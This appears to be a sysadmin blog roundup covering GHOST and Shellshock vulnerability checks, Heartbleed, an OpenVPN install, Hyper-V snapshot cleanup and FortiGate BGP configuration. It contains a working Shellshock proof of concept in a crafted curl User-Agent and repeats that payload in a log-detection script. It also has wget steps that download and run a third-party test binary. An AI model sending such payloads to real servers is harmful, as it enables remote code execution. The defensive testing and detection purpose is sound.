GHOST: glibc gethostbyname buffer overflow – CVE-2015-0235

You can test your system for GHOST, the glibc gethostbyname buffer overflow (CVE-2015-0235).

wget http://www.cirgan.net/GHOST.c
or the compiled one
wget http://www.cirgan.net/GHOST

root@testme /home # gcc GHOST.c -o GHOST
root@testme /home # ./GHOST
not vulnerable

 

CVE-2014-6271 (ShellShock) remote code execution PoC

Create a file for CGI execution:
vi dummy.sh

Fill it with harmless sample code:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "dummy output"

Request it with a crafted User-Agent header:
curl -H 'User-Agent: () { :;}; echo boom>/tmp/boom'  http://localhost/cgi-bin/dummy.sh
dummy output

and check whether the file was created:
ls -l /tmp/boom
-rw-r--r--. 1 apache apache 5 Sep 25 21:20 /tmp/boom
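
On the defender's side, a request like the one above is visible in the access log whenever the Referer and User-Agent headers are logged, because the logged value starts with the function-definition prefix "() {". The script below is an added example, not part of the original post; it assumes Apache's combined log format, and the function names and sample log lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag access-log entries whose Referer or User-Agent begins
# with the Shellshock function-definition prefix "() {".
# Assumption: Apache "combined" log format. Sample lines are constructed.

sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:21:20:01 +0000] "GET /cgi-bin/dummy.sh HTTP/1.1" 200 13 "-" "() { :;}; echo boom>/tmp/boom"
192.0.2.11 - - [25/Sep/2014:21:20:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.12 - - [25/Sep/2014:21:21:40 +0000] "GET /cgi-bin/dummy.sh HTTP/1.1" 200 13 "() { :;}; echo boom>/tmp/boom" "curl/7.29.0"
192.0.2.13 - - [25/Sep/2014:21:22:10 +0000] "GET /js/app.js?cb=f(){} HTTP/1.1" 200 90 "-" "Mozilla/5.0"
192.0.2.14 - - [25/Sep/2014:21:23:00 +0000] "GET /cgi-bin/dummy.sh HTTP/1.1" 200 13 "http://example.test/?q=\"a\"" "() { :;}; echo boom>/tmp/boom"
EOF
}

# Reads log lines on stdin, prints "<client-ip> <header>" for each hit.
scan_shellshock() {
  awk -F'"' '
  {
    # Apache logs a literal backslash as \\ and a literal quote as \".
    # Mask both so escaped quotes inside a value do not shift the fields.
    gsub(/\\\\/, "\002")
    gsub(/\\"/, "\001")
    split($1, pre, " ")
    # Bash only imports a variable as a function when the value starts
    # with exactly "() {", so anchor the match at the start of the field.
    if (index($4, "() {") == 1) print pre[1], "referer"
    if (index($6, "() {") == 1) print pre[1], "user-agent"
  }'
}

sample_log | scan_shellshock
```

The last sample line has escaped quotes in the Referer; without the masking step its User-Agent would land in the wrong field and the entry would be missed.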
 

GNU Bash (ShellShock) Vulnerability – CVE-2014-6271

A critical vulnerability has been discovered recently. For more information, see:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

You can also check your server from a shell with the command below.

env x='() { :;}; echo vulnerable!' bash -c ""

The output on a patched system looks like this:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'

 

Cneonction and nnCoection in HTTP Response Headers

You may receive a Cneonction or nnCoection HTTP response header even if you are not using Keep-Alive on your member servers. Some load balancers rewrite HTTP response headers, so you can see
nnCoection : Close
instead of
Connection : Close
Your web server returns the response header Connection: close, but the load balancer rewrites it to nnCoection: close because keep-alive is enabled on the load balancer and it wants to keep the connection open, so it replaces the Connection header.

The case I met was on a Netscaler MPX appliance; you should disable Client Keep Alive on your service or Service Group. So, the LB will never send the Connection response to clients.
Otherwise, you have to rewrite nnCoection.
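
Both names in this post use exactly the letters of Connection in a different order, which gives a simple way to spot the rewrite in captured response headers. The script below is an added example, not part of the original post; the function names and the sample header lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: find response-header names that are a scrambled spelling of
# "Connection" (same letters, different order), e.g. nnCoection, Cneonction.
# Sample lines are constructed; in practice feed it the output of "curl -sI".

sample_headers() {
  # Header lines collected from several responses, CRLF-terminated.
  printf '%s\r\n' \
    'HTTP/1.1 200 OK' \
    'Date: Thu, 25 Sep 2014 21:20:00 GMT' \
    'nnCoection : Close' \
    'Content-Type: text/html' \
    'Cneonction: close' \
    'Connection: keep-alive' \
    ''
}

# Reads header lines on stdin, prints each scrambled header name found.
find_scrambled_connection() {
  awk -F':' '
  # Return the characters of s in sorted order (insertion sort).
  function sorted(s,   n, i, j, a, t, out) {
    n = length(s)
    for (i = 1; i <= n; i++) a[i] = substr(s, i, 1)
    for (i = 2; i <= n; i++) {
      t = a[i]
      for (j = i - 1; j >= 1 && a[j] > t; j--) a[j + 1] = a[j]
      a[j + 1] = t
    }
    out = ""
    for (i = 1; i <= n; i++) out = out a[i]
    return out
  }
  BEGIN { want = sorted("connection") }
  NF > 1 {                      # skip the status line and blank lines
    name = $1
    gsub(/[ \t\r]/, "", name)   # tolerate "name : value" and CRLF endings
    low = tolower(name)
    if (low != "connection" && sorted(low) == want) print name
  }'
}

sample_headers | find_scrambled_connection
```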

Scanning OpenSSL HeartBleed Vuln with Nmap


There is a serious vulnerability in the OpenSSL cryptographic software library which allows stealing protected information.
This bug allows anyone on the Internet to read the memory of a system that runs a vulnerable OpenSSL version, so attackers can easily obtain the secret keys, usernames and passwords that reside in memory…

How to install OpenVPN Server

Below you will find how to install an OpenVPN server. At the end of the article:

1- We will have a VPN server running under Linux.
2- We will be using Linux PAM accounts to authenticate clients.
3- All connected clients can access the local network and each other.
4- All clients will use the VPN server to access the internet.
5- The VPN server will act as Remote to Site.
6- We will have a sample Windows client configuration to connect.

Setup
Ubuntu Server 12.04
WAN 192.168.1.33/30
LAN 172.16.70.0/24
VPN 10.8.0.0/24

HyperV CSV Stuck at “Backup in Progress”

If your backup software uses Microsoft VSS to take snapshots of your cluster volumes, sometimes a CSV gets stuck in redirected access and reports “Backup in Progress” even if there is no backup running at that time.

1- You cannot turn off redirection mode
2- You cannot change the owner of the volume
3- There are no running backup jobs

Then you may delete the snapshot of the volume in order to bring that volume “Online”,
so log in to the Hyper-V node which is the owner of that volume.

Run CMD with elevated privileges.

Change to the volume on which the backup takes place
cd C:\ClusterStorage\Volume8

Run the diskshadow utility and
list the volumes which have shadow copies.
DISKSHADOW>LIST SHADOWS ALL
If you are sure about what to delete, you may delete the corresponding copy, or delete all as you can see below.
DISKSHADOW>DELETE SHADOWS ALL


 

Excluding Network from BGP on Fortigate

Assuming you are redistributing your FortiGate networks and you want to exclude one or more of them from distribution,

here is an example config.

PS: replace “XXX” with your config.

config router prefix-list
edit "youraclname"
config rule
edit 1
set prefix "IPaddress" "SubnetMask"
unset ge
unset le
next
end
next
end

config router route-map
edit "rmap-bgp"
config rule
edit 1
set action deny
set match-ip-address "youraclname"
next
edit 2
next
end
next
end

config router bgp
set as XXXX
set log-neighbour-changes enable
config neighbor
edit "neighbourIP"
set remote-as XXXX
set route-map-out "rmap-bgp"
set send-community6 disable
next
end
config redistribute "connected"
set status enable
end
config redistribute "rip"
end
config redistribute "ospf"
end
config redistribute "static"
end
config redistribute "isis"
end
config redistribute6 "connected"
end
config redistribute6 "rip"
end
config redistribute6 "ospf"
end
config redistribute6 "static"
end
config redistribute6 "isis"
end
set router-id XXX.XXX.XXX.XXX
end

Fortigate 3810A TFTP Error – Open boot device failed

You may meet “Open boot device failed” if you upload a firmware via TFTP. I think the Fortigate 3810A doesn't support a fresh firmware install via TFTP for FortiOS 5.0.

The workaround is to upload the latest 4.x release via TFTP, then upgrade to 5.0 via the GUI.
At the time I write this post, the latest release for 5.x is GA patch 6 and for 4.x is MR3 Patch 15.